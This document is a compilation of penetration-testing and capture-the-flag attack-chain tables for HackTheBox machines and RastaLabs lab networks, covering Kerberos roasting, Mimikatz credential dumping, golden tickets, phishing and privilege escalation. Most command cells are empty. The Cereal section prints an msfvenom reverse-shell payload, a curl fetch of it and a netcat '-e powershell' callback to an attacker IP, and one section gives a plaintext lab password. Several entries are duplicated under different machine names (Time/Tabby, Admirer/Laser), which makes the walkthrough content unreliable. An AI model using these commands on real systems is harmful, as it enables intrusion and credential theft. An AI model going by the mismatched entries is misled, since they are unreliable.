Network Scenarios
Network#1
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
Network#2
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
Network#3
always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service
Network#4
Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DSync Attack
# Network#5
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Online search for lab IP range | N/A |
2 | Enumeration | Port scanning with masscan |
|
3 | Enumeration | Detailed host scanning with nmap |
|
4 | Enumeration | Finding domain names with crackmapexec |
|
Reel
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning |
|
2 | Enumeration | Gobuster directory scanning |
|
3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a |
4 | Credential Harvesting | Password spraying |
|
5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder |
6 | Hash Cracking | Cracking NTLMv2 hash |
|
7 | Access | PowerShell remote session |
|
8 | Privilege Escalation | Creating a Symlink |
|
9 | Privilege Escalation | Using Check-File command |
|
10 | Exfiltration | Transferring files with nc.exe |
|
Jewel
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning |
|
2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
3 | Web Enumeration | Analyzing .git directory | Check the Gemfile in the .git directory for Ruby and Gem versions |
4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
6 | Post-Exploitation | Getting a reverse shell | Use netcat listener and send the exploit to get a reverse shell |
7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in |
8 | Privilege Escalation | Using .google_authenticator file | Use the contents of |
9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work |
10 | Privilege Escalation | Gaining root access with GTFOBins |
|
Atom
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning |
|
2 | File Analysis | Analyzing executable file |
|
3 | SMB Enumeration | Enumerating SMB shares |
|
4 | SMB File Transfer | Transferring files via SMB |
|
5 | Exploitation | Crafting malicious binary |
|
6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of |
7 | SMB File Transfer | Uploading .yml file via SMB |
|
8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell |
9 | Redis Exploitation | Exploiting Redis |
|
10 | Password Decryption | Decrypting password |
|
Network1
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the |
2 | Cryptography | Decoding the flag | Use |
3 | File Preparation | Preparing files for decryption | Rename the secret file to |
4 | Key Conversion | Converting key for decryption | `$key = Get-Content key.txt |
5 | File Decryption | Decrypting the file |
|
6 | Flag Retrieval | Retrieving the flag | The flag is |
Network2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Enumerating credentials on WS02 |
|
2 | Credential Dumping | Using Mimikatz to dump creds | Upload |
3 | Credential Decryption | Decrypting credentials |
|
4 | Port Forwarding | Setting up port forwarding |
|
5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import |
6 | RDP Connection | Using xfreerdp to connect |
|
7 | Flag Retrieval | Retrieving the flag | The flag is |
Network3
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Enumeration | Finding LAPS group members | Enumeration to find |
2 | Credential Access | Dumping credentials with PowerSploit |
|
3 | Credential Access | Using credentials for access |
|
4 | Credential Access | Getting AD object with credentials |
|
5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
6 | Port Forwarding | Setting up port forwarding with Meterpreter |
|
7 | Exploitation | Using MS17-010 exploit for admin shell |
|
8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are |
9 | Post-Exploitation | Running Mimikatz on WS02 |
|
10 | File Permissions | Modifying file permissions for flag |
|
Network4
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Privilege Escalation | AS-REP Roasting |
|
2 | Hash Extraction | Saving Hash | Copy the hash to a txt file and save it with UTF-8 encoding |
3 | Wordlist Creation | Using kwprocessor |
|
4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash |
5 | Credential Use | User Enumeration |
|
6 | Flag Retrieval | Accessing Flag | The flag is |
Network5
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Viewing shares on |
|
2 | Enumeration | Using PowerSploit for enumeration |
|
3 | Flag Retrieval | Accessing open shares | Flag is |
Network6
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Phishing | Creating phishing HTA |
|
2 | Web Server Setup | Hosting HTA on Apache2 |
|
3 | Listener Setup | Setting up Metasploit listener |
|
4 | Share Enumeration | Viewing shares on the network |
|
5 | User Enumeration | Displaying domain user accounts |
|
6 | User Information | Viewing user info |
|
7 | Group Enumeration | Viewing domain group members |
|
8 | Drive Enumeration | Listing logical drives |
|
9 | Network Recon | Pinging servers for IP addresses |
|
10 | Flag Retrieval | Accessing the flag | Flag is |
11 | KeePass Database | Found KeePass database and key file | Located in |
Network7
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | User Enumeration | Finding user directory on |
|
2 | Network Drive Mount | Mounting network drive to access file |
|
3 | File Conversion | Converting .ppk to OpenSSH format |
|
4 | Network Configuration | Adding route and running proxy server | Commands for adding route and running socks4a proxy server on |
5 | SSH Connection | Connecting via SSH with proxychains |
|
6 | Privilege Escalation | Using exploit for privilege escalation | Compile exploit with |
7 | File Transfer | Transferring exploit to target |
|
8 | File Download | Downloading file from remote to local |
|
9 | Flag Retrieval | Retrieving the flag | Flag is |
Network8
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to |
|
2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on |
3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on |
4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit |
5 | Enumeration | Using CrackMapExec to enumerate |
|
6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on |
8 | Credential Decryption | Decrypting credentials |
|
9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate |
10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard |
11 | RDP Connection | Connecting via RDP with credentials |
|
12 | Flag Retrieval | Retrieving the flag | Flag is |
Network9
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws05 |
|
2 | Credential Use | Using rweston_da hash |
|
3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
4 | Flag Retrieval | Retrieving the flag | Flag is |
Network10
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Using | Log in to |
2 | Lateral Movement | RDP to | RDP to |
3 | Malware Execution | Running | Run |
4 | Credential Dumping | Invoke Mimikatz from | Use option 4 in |
5 | Credential Use | Pass-the-hash with Mimikatz |
|
6 | Golden Ticket Attack | Perform DCSync to get | Use option 10 in |
7 | Golden Ticket Attack | Generate golden ticket |
|
8 | Golden Ticket Attack | Use golden ticket |
|
9 | Flag Retrieval | Accessing the flag |
|
Network11
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Access | Using | Log in to |
2 | Lateral Movement | RDP to | Take RDP of |
3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
4 | Database Querying | Querying SQL database |
|
5 | Flag Retrieval | Retrieving the flag from database |
|
Network12
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Logging in with |
|
2 | Lateral Movement | RDP to |
|
3 | GPO Enumeration | Enumerating GPO permissions | `Get-NetGPO |
4 | Group Membership | Checking group members |
|
5 | GPO Permission | Finding GPO with weak permissions | `Get-NetGPO -ComputerName fs01.rastalabs.local |
6 | OU Enumeration | Finding host with specific policy | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" |
7 | Policy Enumeration | Identifying applied policy | `Get-NetGPO -ComputerName fs01.rastalabs.local |
8 | GPO Abuse | Creating and applying immediate tasks |
|
9 | File Permissions | Modifying permissions for |
|
10 | Flag Retrieval | Retrieving the flag | Flag is |
SneakyMailer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap scan |
|
2 | DNS Enumeration | Brute-force subdomains |
|
3 | Email Gathering | Extract emails | Extract emails from |
4 | Phishing | Send phishing emails | Use |
5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic |
6 | Email Client Setup | Configure email client | Set up |
7 | FTP Access | Access FTP |
|
8 | Reverse Shell | Upload and trigger reverse shell | Upload |
9 | Privilege Escalation | Add SSH key to authorized keys | Add generated SSH key to |
10 | Sudo Exploitation | Exploit sudo permissions | Use |
Mango
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Scanning | Masscan and Nmap |
|
2 | Web Enumeration | Checking web ports | Access web service on ports 80 and 443 |
3 | SSL Certificate | Viewing certificate | View SSL certificate details |
4 | Host File Editing | Adding VHOST to hosts file | Edit |
5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify request for NoSQL injection |
6 | Data Extraction | Automating credential extraction | Run Python script to extract credentials for |
7 | SSH Connection | Accessing SSH | SSH into the server using extracted credentials |
8 | User Flag Access | Retrieving user flag | Use |
9 | Privilege Escalation | Exploiting SUID file | Use SUID file to read root flag or exploit for root access |
10 | Root Flag Access | Reading root flag | Run binary or use |
Time
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan |
|
2 | Web Vulnerability Scan | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create |
4 | Initial Access | Gaining a shell as user | Input crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using | Add your SSH public key to |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture |
Tabby
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan |
|
2 | Web Enumeration | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create |
4 | Initial Access | Gaining a shell as user | Input crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using | Add your SSH public key to |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture |
Quick
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan |
|
2 | Web Enumeration | Dirbuster scan |
|
3 | QUIC Protocol Access | Accessing HTTP/3 Protocol |
|
ForwardSlash
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan |
|
2 | Subdomain Enumeration | WFUZZ fuzzing | Use WFUZZ with common wordlists to find subdomains |
3 | Directory Enumeration | GoBuster scanning | Use GoBuster to enumerate directories |
4 | LFI Vulnerability | Exploiting Local File Inclusion | Use Burp Suite to exploit LFI and directory traversal |
5 | Database Credential Access | Obtaining credentials via LFI | Use LFI to read |
6 | API Exploitation | Using php://filter wrapper | Exploit API with |
7 | FTP Credential Access | Decoding Base64 for credentials | Decode Base64 to find FTP credentials |
8 | SSH Access | Using FTP credentials for SSH | Use FTP credentials to access SSH |
9 | User Flag Acquisition | Enumerating user directories | Find and read |
P.O.O
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning |
|
2 | Directory Enumeration | Fuzzing with WFUZZ |
|
3 | Exploitation | Exploiting .DS_Store File | Use |
P.O.O 2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning |
|
2 | Web Enumeration | WFUZZ Directory Discovery |
|
3 | Git Repository Cloning | Using GitDumper |
|
4 | Memcached Credential Access | Using memcached-cli to retrieve credentials |
|
5 | Password Cracking | Using John the Ripper | Use John the Ripper with retrieved hashes |
6 | Gogs Service Access | Logging into Gogs with cracked credentials | Log into Gogs service at port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack |
Dyplesher
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning |
|
2 | Web Enumeration | WFUZZ Directory Discovery |
|
3 | Cloning Exposed Repository | Using GitDumper |
|
4 | Memcached Credential Access | Using memcached-cli |
|
5 | Cracking Hashes | Using John the Ripper | Use John the Ripper with retrieved hashes |
6 | Gogs Service Access | Logging into Gogs | Log into Gogs service at port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack |
Cascade
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning |
|
2 | User Enumeration | Enum4Linux |
|
3 | LDAP Enumeration | Impacket LDAPSearch |
|
4 | SMB Enumeration | Accessing SMB Shares |
|
5 | Log Analysis | Reviewing Service Logs |
|
6 | Registry Analysis | Downloading and Analyzing Registry |
|
7 | Password Decryption | Decrypting VNC Passwords | Use online HEX decoder or VNC password decryption tool |
8 | Remote Access | Using Evil-WinRM |
|
9 | Share Enumeration | Listing SMB Shares |
|
10 | Database Analysis | Analyzing SQLite Database | Open |
Blunder
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning |
|
2 | Web Enumeration | Fuzzing with Extensions |
|
3 | Exploit Identification | Searchsploit |
|
4 | Brute Force Attack | Using Custom Script | Custom Python script for brute-forcing |
5 | Exploitation | Metasploit Framework |
|
6 | Shell Stabilization | Python TTY Spawn |
|
7 | User Privilege Discovery | Checking Sudo Permissions |
|
8 | Privilege Escalation | Exploiting Sudo Bug CVE-2019-14287 |
|
Worker
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning |
|
2 | SVN Enumeration | SVN Commands |
|
3 | Sub-Domain Discovery | Adding Sub-Domains to Hosts | Edit |
4 | SVN Log Analysis | Viewing SVN Logs |
|
5 | SVN Diff Analysis | Viewing SVN Diffs |
|
6 | Azure DevOps Access | Logging into Azure DevOps | Use credentials to log into |
7 | Malicious File Upload | Creating and Uploading ASPX File |
|
8 | Meterpreter Shell | Getting Reverse Shell | Set up listener with |
9 | Post-Exploitation | Meterpreter Commands |
|
Jerry
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning |
|
2 | Access Tomcat | Default Credentials | Use default credentials |
3 | Deploy WAR | MsfVenom WAR File Creation |
|
4 | Gain Shell | Netcat Listener |
|
5 | Privilege Check | Whoami Command |
|
6 | Flag Acquisition | Directory Navigation and Reading | Navigate to |
Admirer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning |
|
2 | Accessing FTP | Using Found Credentials | Use |
3 | Exploring Web Server | Checking | Access |
4 | Downloading Files | Using FTP to Download Files | Download |
5 | Code Analysis | Reviewing PHP Scripts | Analyze |
6 | SSH Access | Using Credentials for SSH | Use |
7 | Privilege Escalation | Analyzing Sudo Permissions | Run |
8 | Exploiting Scripts | Using | Exploit the |
9 | Gaining Root | Python Path Hijacking | Use |
Laser
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning |
|
2 | Accessing FTP | Using Found Credentials | Use |
3 | Exploring Web Server | Checking | Access |
4 | Downloading Files | Using FTP to Download Files | Download |
5 | Code Analysis | Reviewing PHP Scripts | Analyze |
6 | SSH Access | Using Credentials for SSH | Use |
7 | Privilege Escalation | Analyzing Sudo Permissions | Run |
8 | Exploiting Scripts | Using | Exploit the |
9 | Gaining Root | Python Path Hijacking | Use |
Unbalanced
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning |
|
2 | Accessing Rsync | Listing Rsync Modules |
|
3 | Downloading Backups | Using Rsync to Download Files |
|
4 | Decrypting Backups | Decrypting EncFS |
|
| |||
5 | Reading Files | Accessing Decrypted Configuration |
|
Files |
|
SneakyMailer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Information Gathering | Nmap Scanning |
|
2 | Subdomain Enumeration | Using |
|
3 | Email Collection | Extracting Emails from Web Page | Manually visit |
4 | Email Engagement | Sending Emails with |
|
5 | Credential Harvesting | Netcat Listener |
|
6 | Accessing SMTP | Using |
|
7 | Exploring Sent Items | Checking Sent Emails | Check sent items for any useful information after accessing the SMTP server |
Notebook
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Web Server Analysis | Manual inspection of web application on port 80/tcp |
2 | Vulnerability Analysis | JWT Token Analysis | Decode JWT token, notice "kid" parameter pointing to an internal address |
3 | Exploitation | Custom JWT Token Creation | Develop |
4 | Administration Panel Access | Access with JWT Token | Use generated JWT token to access the admin panel |
5 | Web Shell Upload | PHP File Upload | Upload a malicious PHP file as allowed by the admin panel |
6 | Reverse Shell | Exploit PHP File | Get a reverse shell as |
7 | Post-Exploitation | User Access | Use |
8 | Privilege Escalation | Docker Exploitation | Use |
9 | Root Access | CVE-2019-5736 Exploit | Modify and run CVE-2019-5736 exploit to get root access |
AI
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scan |
|
2 | Web Enumeration | Manual Inspection | Inspect web application on port 80/tcp, hover over logo for menu |
3 | Web Enumeration | Gobuster Directory Scan |
|
4 | Audio File Handling | Convert MP3 to WAV |
|
5 | SQL Injection | Extract Database Name | Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database" |
6 | SQL Injection | Enumerate Table Names | Audio payload: "one open single quote union select test from test comment database" |
7 | SQL Injection | Enumerate Users Table | Audio payload: "one open single quote union select test from users comment database" |
8 | SQL Injection | Extract Passwords | Audio payload: "one open single quote union select password from users comment database" |
9 | Privilege Escalation | Exploit JDWP Service | Use |
ServMon
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scan |
|
2 | FTP Enumeration | Anonymous FTP Access |
|
3 | File Analysis | Reviewing Downloaded Files |
|
4 | Web Enumeration | Enumerate Web Pages | Manual inspection of web application on port 80/tcp |
5 | Exploitation | Exploit NVMS-1000 (CVE-2019-2085) | Use CVE details from Exploit-DB and Brup Suite to exploit |
6 | Credential Access | Extract Passwords via Directory Traversal |
|
7 | Brute Force | SSH Brute Force with Hydra |
|
8 | SSH Access | Login via SSH | SSH login with found credentials |
9 | Privilege Escalation | Exploit NSClient++ 0.5.2.35 | Follow CVE details from Exploit-DB to exploit NSClient++ |
10 | Local Port Forwarding | Port Forwarding via SSH | Use SSH port forwarding to interact with local services |
OpenAdmin
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan |
|
2 | Web Enumeration | Manual Visit, Gobuster | Visit |
3 | Exploitation | OpenNetAdmin RCE | Use exploit from |
4 | Initial Foothold | Reverse Shell | Gain reverse shell as |
5 | User Access | Password Reuse | SSH as |
6 | Internal Service Access | Port Forwarding | Forward port 52846 to local machine and access internal service |
7 | Privilege Escalation | Cracking Hash | Crack |
8 | SSH Key Access | Decrypt SSH Key | Use |
9 | Root Access | Sudo Exploitation of Nano | Use |
Magic
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Nmap Scanning | Nmap Scan |
|
2 | Enumerating Web Page | Manual Visit | Visit |
3 | Bypass Login | SQL Injection | Use |
4 | Uploading Shell | Bypass File Upload Restrictions |
|
5 | Gaining Access | Reverse Shell |
|
6 | Enumerating Credentials | Reading Configuration Files |
|
7 | Switching User Shell | User Switching |
|
8 | Find SUID files | Privilege Escalation | Not specified in the summary |
9 | Getting ROOT | Exploitation | Not specified in the summary |
Spectra
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan |
|
2 | Web Enumeration | Manual Visit, Gobuster | Visit |
3 | Web Enumeration | Inspect Source Code | Inspect source code of |
4 | Credential Access | Username and Password Discovery | Found credentials: username |
5 | Web Exploitation | WordPress Admin Login | Login to WordPress admin panel with found credentials |
6 | Reverse Shell | Metasploit Reverse Shell | Use |
7 | Privilege Escalation | Sudo Privileges Exploitation | Use |
8 | Privilege Escalation | Editing Service Configuration | Edit |
9 | Privilege Escalation | Gaining Root Access | Execute |
Sink
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan |
|
2 | Web Enumeration | Inspect Source Code | Inspect source code for CVE-2019-18277 vulnerability |
3 | Exploitation | HTTP Request Smuggling | Edit and send crafted HTTP requests to exploit CVE-2019-18277 |
4 | Post-Exploitation | Capture Admin Cookie | Reload the home page to capture the admin cookie after the exploit |
5 | Privilege Access | Use Credentials Found in Notes | Use credentials from notes to access different services (Chef, Dev Node, Nagios) |
6 | Privilege Access | Access Gitea Service | Log in to Gitea service with found credentials |
7 | Privilege Access | Find SSH Key for User | Find |
8 | Privilege Access | Use SSH Key to Gain Access | Use |
Ready
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan |
|
2 | Web Enumeration | GitLab Sign In Page | Inspect GitLab sign in page for vulnerabilities |
3 | Exploitation | GitLab 11.4.7 Remote Code Execution | Follow steps from LiveOverflow video & article for RCE |
4 | Reverse Shell | Gain Reverse Shell | Use the payload from the video to gain a reverse shell |
5 | Post-Exploitation | Find Credentials | Locate |
6 | Privilege Access | Use Found Credentials | Use found SMTP password to change user and gain root access in the docker container |
7 | Privilege Escalation | Escaping Docker Container | Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges |
8 | Root Access | SSH Key | Use the provided |
Pivotapi
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan |
|
2 | FTP Enumeration | Anonymous FTP Access |
|
3 | Metadata Analysis | ExifTool Analysis | `exiftool * |
4 | Kerberos Attack | GetNPUsers.py Kerberos Preauthentication |
|
5 | Hash Cracking | John the Ripper |
|
Openkeys
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Scanning | Nmap Scan |
|
2 | Web Enumeration | Directory Scan |
|
3 | Exploitation | Vulnerability in OpenBSD | Use |
4 | SSH Key Discovery | Cookie Modification | Modify the cookie to include a valid username to reveal SSH keys |
5 | SSH Access | Use Discovered SSH Key |
|
6 | Privilege Escalation | Local Exploit for OpenBSD |
|
Oouch
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scan |
|
2 | Web Enumeration | Directory Scan |
|
3 | OAuth Exploitation | SSRF in Contact Page | Use SSRF to link account with admin |
4 | Access Token | Intercept Request with Burp | Intercept |
5 | SSH Key Discovery | Accessing SSH Private Keys | Access API to retrieve SSH keys |
6 | Docker Exploitation | Exploit Docker UWSGI Service | Log into Docker and exploit UWSGI service running as www-data |
7 | Privilege Escalation | Exploit Dbus | Exploit Dbus to get a shell as root and obtain root.txt |
Fuse
id | stage | techniques | commands |
---|---|---|---|
1 | Recon | Nmap scan |
|
2 | Enumeration | Enumerating SMB, HTTP, and RPC |
|
3 | Exploitation | Password Spraying |
|
4 | Privilege Escalation | Abusing SeLoadDriverPrivilege | Compiling files with Visual Studio, using |
5 | Post-Exploitation | Accessing Admin Shell |
|
Cereal
Reconnaissance:
Techniques: Port scanning with Nmap, adding domain names to the
/etc/hosts
file.Commands:
nmap -sC -sV -oA /result 10.10.10.217
,cat nmap/result.nmap
.
Enumeration:
Techniques: Using Gobuster to find directories, dumping
.git
directory with GitTools.Commands:
gobuster dir -u http://cereal.htb -w wordlist
,bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/
.
Exploitation:
Techniques: Exploiting Cross-site Scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell.
Commands:
python3 jwt_tool.py -b -S hs256 -p 'secret'
,bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/
.
Gaining Access:
Techniques: Uploading and executing a shell, using Python scripts to automate tasks.
Commands:
python3 -m http.server 80
,nc -nvlp 9001
,python3 dedsec.py
,curl -k https://source.cereal.htb/uploads/shell.aspx
.
Privilege Escalation:
Techniques: Port forwarding, exploiting
SEImpersonation
privilege with JuicyPotato, using GraphQL for SSRF.Commands:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe
,curl http://10.10.14.6/ded.exe -o C:\\temp\\ded.exe
,nc -nvlp 1337
.
Post-Exploitation:
Techniques: Maintaining access, executing reverse shells.
Commands:
.\\GenericPotato.exe -p "C:\\temp\\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889
.
Bucket
id | stage | techniques | commands |
---|---|---|---|
1 | Recon | Nmap scan to find open ports |
|
2 | Enumeration | Gobuster to find directories |
|
3 | AWS Configuration | Configure AWS CLI |
|
4 | Data Extraction | List tables and contents in DynamoDB |
|
| |||
5 | Exploitation | Upload PHP reverse shell to the server |
|
6 | Privilege Escalation | Port forwarding and exploiting a web service for code execution as root |
|
Create and trigger payload to get root's id_rsa |
|
Armageddon
id | stage | techniques | commands |
---|---|---|---|
1 | Recon | Nmap scanning |
|
2 | Exploitation | Drupalgeddon 2 Forms API Property Injection |
|
3 | Gaining Access | Finding credentials in settings.php | Inspect |
4 | Database Access | Accessing MySQL database |
|
5 | Data Exfiltration | Dumping usernames and password hashes |
|
6 | Password Cracking | Using John the Ripper to crack password hashes |
|
7 | Access with SSH | SSH into the machine with cracked credentials |
|
8 | Privilege Escalation | Exploiting snapd (dirty_sock exploit) | Use the dirty_sock exploit to escalate privileges |
9 | Capture Flag | Reading user and root flags |
|
Traceback
id | stage | techniques | commands |
---|---|---|---|
1 | Recon | Nmap scanning |
|
2 | Enumeration | Source code analysis, Gobuster |
|
3 | Exploitation | Accessing web shell | Navigate to |
4 | Access | SSH key upload |
|
5 | Initial Access | SSH as webadmin |
|
6 | Privilege Escalation (User) | Using |
|
7 | Capture User Flag | Reading user flag |
|
8 | Privilege Escalation (Root) | Modifying |
|
9 | Capture Root Flag | Reading root flag |
|
Rastalab1
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Scanning | Masscan |
|
2 | Host Discovery | Nmap Scan |
|
3 | Domain Discovery | CrackMapExec |
|
4 | Network Mapping | Host Enumeration | Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc. |
Rastalab2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Outlook Version Discovery | Check outlook version on port 443 at 10.10.110.254 |
2 | Enumeration | Web Page Analysis | Analyze Rastalabs website on 10.10.110.10 on port 80 |
3 | User Profiling | Social Media Analysis | Review Amber Hope's LinkedIn and Instagram profiles |
4 | Credential Access | Brute Force | Use Metasploit |
5 | Access | Outlook Login | Login with credentials 'RLAB\ahope' : 'Labrador8209' |
6 | Flag Discovery | Task Navigation | Navigate to tasks in Outlook to find the flag |
Rastalab3
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Vault Credential Extraction |
|
2 | Credential Dumping | Mimikatz Execution |
|
3 | Credential Decryption | DPAPI Master Key Usage |
|
4 | Remote Desktop | Port Forwarding |
|
5 | Remote Desktop | Remmina Configuration | Import |
6 | Remote Desktop | FreeRDP Connection |
|
7 | Flag Discovery | Task Navigation | Flag found: |
Rastalab4
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | GPO Enumeration | Group Policy Object Enumeration | `Get-NetGPO |
3 | Group Membership | Group Membership Checking |
|
4 | GPO Permission Find | GPO Permission Enumeration | `Get-NetGPO -ComputerName fs01.rastalabs.local |
5 | GPO Abuse | Group Policy Object Abuse |
|
6 | Add to Administrators | Adding User to Administrators Group |
|
7 | Clean Up | Group Policy Object Task Removal |
|
8 | File Permissions | Modifying File Access Control Lists |
|
9 | Flag Discovery | Retrieving Sensitive Information | Flag found: |
Rastalab5
ID | Stage | Techniques | Command |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | SQL Interaction | SQL Server Management Studio | Start SQL Management Studio, connect via Windows authentication, query Umbraco database |
3 | Data Extraction | SQL Query Execution |
|
4 | Flag Discovery | SQL Data Retrieval |
|
Rastalab6
ID | Stage | Techniques | Command |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | Credential Dumping | Invoke Mimikatz | Run |
3 | Pass-the-Hash | Mimikatz Pass-the-Hash |
|
4 | Golden Ticket | Kerberos Golden Ticket Attack |
|
5 | Ticket Injection | Kerberos Ticket Injection |
|
6 | Flag Discovery | Access Domain Controller |
|
Rastalab7
ID | Stage | Techniques | Command |
---|---|---|---|
1 | Port Forwarding | Local Port Forwarding |
|
2 | Remote Shell Access | MSF psexec / Impacket psexec | Use msf or impacket psexec to get shell on ws01 |
3 | Routing | Meterpreter Routing | Add route in meterpreter, set socks4a proxy in msf |
4 | Hash Dumping | CrackMapExec with Proxychains |
|
5 | Credential Access | Mimikatz Credential Dump |
|
